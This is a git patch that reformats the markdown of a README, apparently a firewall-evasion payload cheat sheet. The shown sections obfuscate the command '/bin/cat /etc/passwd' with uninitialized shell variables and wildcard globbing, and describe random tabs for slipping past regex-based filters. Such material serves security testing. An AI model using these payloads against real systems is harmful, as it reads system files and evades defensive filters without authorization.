From 80823adb7fc85c9d99cacd16d3e75e1ed1152117 Mon Sep 17 00:00:00 2001 From: Infected Drake Date: Thu, 28 Feb 2019 00:10:21 +0530 Subject: [PATCH] Some more markdown added. --- README.md | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 0d9c891..54b3938 100644 --- a/README.md +++ b/README.md @@ -1725,23 +1725,22 @@ __11. Uninitialized Variables__ > __BONUS:__ Variable names can have any number of random characters. I have represented them here as `$aaaaaa`, `$bbbbbb`, and so on. You can replace them with any number of random chars like `$ushdjah` and so on. ;) -- Level 1 Obfuscation: Normal +- __Level 1 Obfuscation__: Normal __Standard__: `/bin/cat /etc/passwd` __Obfuscated__: `/bin/cat$u /etc/passwd$u` -- Level 2 Obfuscation: Postion Based +- __Level 2 Obfuscation__: Postion Based __Standard__: `/bin/cat /etc/passwd` __Obfuscated__: $u/bin$u/cat$u $u/etc$u/passwd$u -- Level 3 Obfuscation: Random chars +- __Level 3 Obfuscation__: Random chars __Standard__: `/bin/cat /etc/passwd` __Obfuscated__: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff An exotic payload crafted: - - +``` $sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf - +``` __12. Random Tabs__ - Tabs often help to evade firewalls especially regex based ones.